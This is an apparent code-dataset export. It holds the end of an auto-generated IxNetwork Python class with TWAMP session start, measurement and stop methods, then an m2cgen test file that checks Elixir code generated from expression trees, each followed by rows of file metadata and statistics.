- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('twampStart', payload=payload, response_object=None)
def TwampStartMeasurement(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the twampStartMeasurement operation on the server.
Commence active two-way measurement
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
twampStartMeasurement(async_operation=bool)
-------------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
twampStartMeasurement(Arg2=enum, async_operation=bool)
------------------------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('twampStartMeasurement', payload=payload, response_object=None)
def TwampStop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the twampStop operation on the server.
Teardown TWAMP sessions for selected ranges
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
twampStop(async_operation=bool)
-------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
twampStop(Arg2=enum, async_operation=bool)
------------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('twampStop', payload=payload, response_object=None)
| 161.126761
| 23,008
| 0.817408
| 8,365
| 80,080
| 7.803586
| 0.04483
| 0.239073
| 0.17366
| 0.13481
| 0.942598
| 0.933346
| 0.92492
| 0.924384
| 0.919313
| 0.911071
| 0
| 0.00973
| 0.068257
| 80,080
| 496
| 23,009
| 161.451613
| 0.865133
| 0.891521
| 0
| 0.263566
| 0
| 0
| 0.08706
| 0.017323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.255814
| false
| 0
| 0.023256
| 0
| 0.488372
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a14bf3375632b44e6afebba0a39df245fb43b011
| 21,568
|
py
|
Python
|
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
from m2cgen import ast
from m2cgen.interpreters import ElixirInterpreter
from tests.utils import assert_code_equal
def test_if_expr():
expr = ast.IfExpr(
ast.CompExpr(ast.NumVal(1), ast.FeatureRef(0), ast.CompOpType.EQ),
ast.NumVal(2),
ast.NumVal(3))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (read(input,0)) ->
2.0
true ->
3.0
end
end
func0.()
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_bin_num_expr():
expr = ast.BinNumExpr(
ast.BinNumExpr(
ast.FeatureRef(0), ast.NumVal(-2), ast.BinNumOpType.DIV),
ast.NumVal(2),
ast.BinNumOpType.MUL)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
((read(input,0)) / (-2.0)) * (2.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_dependable_condition():
left = ast.BinNumExpr(
ast.IfExpr(
ast.CompExpr(ast.NumVal(1),
ast.NumVal(1),
ast.CompOpType.EQ),
ast.NumVal(1),
ast.NumVal(2)),
ast.NumVal(2),
ast.BinNumOpType.ADD)
right = ast.BinNumExpr(ast.NumVal(1), ast.NumVal(2), ast.BinNumOpType.DIV)
bool_test = ast.CompExpr(left, right, ast.CompOpType.GTE)
expr = ast.IfExpr(bool_test, ast.NumVal(1), ast.FeatureRef(0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
2.0
end
end
func1 = fn ->
cond do ((func0.()) + (2.0)) >= ((1.0) / (2.0)) ->
1.0
true ->
read(input,0)
end
end
func1.()
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_nested_condition():
left = ast.BinNumExpr(
ast.IfExpr(
ast.CompExpr(ast.NumVal(1),
ast.NumVal(1),
ast.CompOpType.EQ),
ast.NumVal(1),
ast.NumVal(2)),
ast.NumVal(2),
ast.BinNumOpType.ADD)
bool_test = ast.CompExpr(ast.NumVal(1), left, ast.CompOpType.EQ)
expr_nested = ast.IfExpr(bool_test, ast.FeatureRef(2), ast.NumVal(2))
expr = ast.IfExpr(bool_test, expr_nested, ast.NumVal(2))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
2.0
end
end
func1 = fn ->
cond do (1.0) == ((func0.()) + (2.0)) ->
cond do (1.0) == ((func0.()) + (2.0)) ->
read(input,2)
true ->
2.0
end
true ->
2.0
end
end
func1.()
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_raw_array():
expr = ast.VectorVal([ast.NumVal(3), ast.NumVal(4)])
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
[3.0, 4.0]
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_multi_output():
expr = ast.IfExpr(
ast.CompExpr(
ast.NumVal(1),
ast.NumVal(1),
ast.CompOpType.NOT_EQ),
ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
ast.VectorVal([ast.NumVal(3), ast.NumVal(4)]))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) != (1.0) ->
[1.0, 2.0]
true ->
[3.0, 4.0]
end
end
func0.()
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_bin_vector_expr():
expr = ast.BinVectorExpr(
ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
ast.VectorVal([ast.NumVal(3), ast.NumVal(4)]),
ast.BinNumOpType.ADD)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
add_vectors([1.0, 2.0], [3.0, 4.0])
end
defp add_vectors(v1_list, v2_list) do
for {a,b} <- Enum.zip(v1_list, v2_list), do: a+b
end
defp mul_vector_number(v1, num) do
for i <- v1, do: i * num
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_bin_vector_num_expr():
expr = ast.BinVectorNumExpr(
ast.VectorVal([ast.NumVal(1), ast.NumVal(2)]),
ast.NumVal(1),
ast.BinNumOpType.MUL)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
mul_vector_number([1.0, 2.0], 1.0)
end
defp add_vectors(v1_list, v2_list) do
for {a,b} <- Enum.zip(v1_list, v2_list), do: a+b
end
defp mul_vector_number(v1, num) do
for i <- v1, do: i * num
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
class CustomElixirInterpreter(ElixirInterpreter):
bin_depth_threshold = 2
def test_depth_threshold_with_bin_expr():
expr = ast.NumVal(1)
for _ in range(4):
expr = ast.BinNumExpr(ast.NumVal(1), expr, ast.BinNumOpType.ADD)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
(1.0) + ((1.0) + (1.0))
end
(1.0) + ((1.0) + (func0.()))
end
end
"""
interpreter = CustomElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_depth_threshold_without_bin_expr():
expr = ast.NumVal(1)
for _ in range(4):
expr = ast.IfExpr(
ast.CompExpr(
ast.NumVal(1), ast.NumVal(1), ast.CompOpType.EQ),
ast.NumVal(1),
expr)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
cond do (1.0) == (1.0) ->
1.0
true ->
1.0
end
end
end
end
end
func0.()
end
end
"""
interpreter = CustomElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_deep_mixed_exprs_not_reaching_threshold():
expr = ast.NumVal(1)
for _ in range(4):
inner = ast.NumVal(1)
for __ in range(2):
inner = ast.BinNumExpr(ast.NumVal(1), inner, ast.BinNumOpType.ADD)
expr = ast.IfExpr(
ast.CompExpr(
inner, ast.NumVal(1), ast.CompOpType.EQ),
ast.NumVal(1),
expr)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (1.0))) == (1.0) ->
1.0
true ->
1.0
end
end
end
end
end
func0.()
end
end
"""
interpreter = CustomElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_deep_mixed_exprs_exceeding_threshold():
expr = ast.NumVal(1)
for i in range(4):
inner = ast.NumVal(1)
for j in range(4):
inner = ast.BinNumExpr(ast.NumVal(i), inner, ast.BinNumOpType.ADD)
expr = ast.IfExpr(
ast.CompExpr(
inner, ast.NumVal(j), ast.CompOpType.EQ),
ast.NumVal(1),
expr)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
(3.0) + ((3.0) + (1.0))
end
func1 = fn ->
(2.0) + ((2.0) + (1.0))
end
func2 = fn ->
(1.0) + ((1.0) + (1.0))
end
func3 = fn ->
(0.0) + ((0.0) + (1.0))
end
func4 = fn ->
cond do ((3.0) + ((3.0) + (func0.()))) == (3.0) ->
1.0
true ->
cond do ((2.0) + ((2.0) + (func1.()))) == (3.0) ->
1.0
true ->
cond do ((1.0) + ((1.0) + (func2.()))) == (3.0) ->
1.0
true ->
cond do ((0.0) + ((0.0) + (func3.()))) == (3.0) ->
1.0
true ->
1.0
end
end
end
end
end
func4.()
end
end
"""
interpreter = CustomElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_abs_expr():
expr = ast.AbsExpr(ast.NumVal(-1.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
abs(-1.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_exp_expr():
expr = ast.ExpExpr(ast.NumVal(1.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.exp(1.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_pow_expr():
expr = ast.PowExpr(ast.NumVal(2.0), ast.NumVal(3.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.pow(2.0, 3.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_sqrt_expr():
expr = ast.SqrtExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.sqrt(2.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_tanh_expr():
expr = ast.TanhExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.tanh(2.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_log_expr():
expr = ast.LogExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.log(2.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_log1p_expr():
expr = ast.Log1pExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
log1p(2.0)
end
defp log1p(x) do
cond do
x == 0.0 -> 0.0
x == -1.0 -> -1.7976931348623157e+308
x < 1.0 -> :nan
abs(x) < 0.5 * 4.94065645841247e-324 -> x
(x > 0.0 && x < 1.0e-8) || (x > -1.0e-9 && x < 0.0) -> x * (1.0 - x * 0.5)
abs(x) < 0.375 ->
coeffs = [
0.10378693562743769800686267719098e+1,
-0.13364301504908918098766041553133e+0,
0.19408249135520563357926199374750e-1,
-0.30107551127535777690376537776592e-2,
0.48694614797154850090456366509137e-3,
-0.81054881893175356066809943008622e-4,
0.13778847799559524782938251496059e-4,
-0.23802210894358970251369992914935e-5,
0.41640416213865183476391859901989e-6,
-0.73595828378075994984266837031998e-7,
0.13117611876241674949152294345011e-7,
-0.23546709317742425136696092330175e-8,
0.42522773276034997775638052962567e-9,
-0.77190894134840796826108107493300e-10,
0.14075746481359069909215356472191e-10,
-0.25769072058024680627537078627584e-11,
0.47342406666294421849154395005938e-12,
-0.87249012674742641745301263292675e-13,
0.16124614902740551465739833119115e-13,
-0.29875652015665773006710792416815e-14,
0.55480701209082887983041321697279e-15,
-0.10324619158271569595141333961932e-15]
x * (1.0 - x * chebyshev_broucke(x / 0.375, coeffs))
true -> :math.log(1.0+x)
end
end
defp chebyshev_broucke(x, coeffs) do
{b0, _b1, b2} = coeffs
|> Enum.reverse()
|> Enum.reduce({0.0, 0.0, 0.0}, fn k, {b0, b1, _b2} ->
{(k + x * 2.0 * b0 - b1), b0, b1}
end)
(b0 - b2) * 0.5
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_atan_expr():
expr = ast.AtanExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
:math.atan(2.0)
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_softmax_expr():
expr = ast.SoftmaxExpr([ast.NumVal(2.0), ast.NumVal(3.0)])
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
softmax([2.0, 3.0])
end
defp softmax(x) do
max_elem = Enum.max(x)
exps = for f <- x, do: :math.exp(f-max_elem)
sum_exps = Enum.sum(exps)
for i <- exps, do: i/sum_exps
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_sigmoid_expr():
expr = ast.SigmoidExpr(ast.NumVal(2.0))
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
sigmoid(2.0)
end
defp sigmoid(x) do
1.0 / (1.0 + :math.exp(-x))
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
def test_reused_expr():
reused_expr = ast.ExpExpr(ast.NumVal(1.0), to_reuse=True)
expr = ast.BinNumExpr(reused_expr, reused_expr, ast.BinNumOpType.DIV)
expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
:math.exp(1.0)
end
(func0.()) / (func0.())
end
end
"""
interpreter = ElixirInterpreter()
assert_code_equal(interpreter.interpret(expr), expected_code)
| 26.302439
| 82
| 0.533197
| 2,683
| 21,568
| 4.159896
| 0.068207
| 0.015052
| 0.012633
| 0.01326
| 0.808351
| 0.777798
| 0.763193
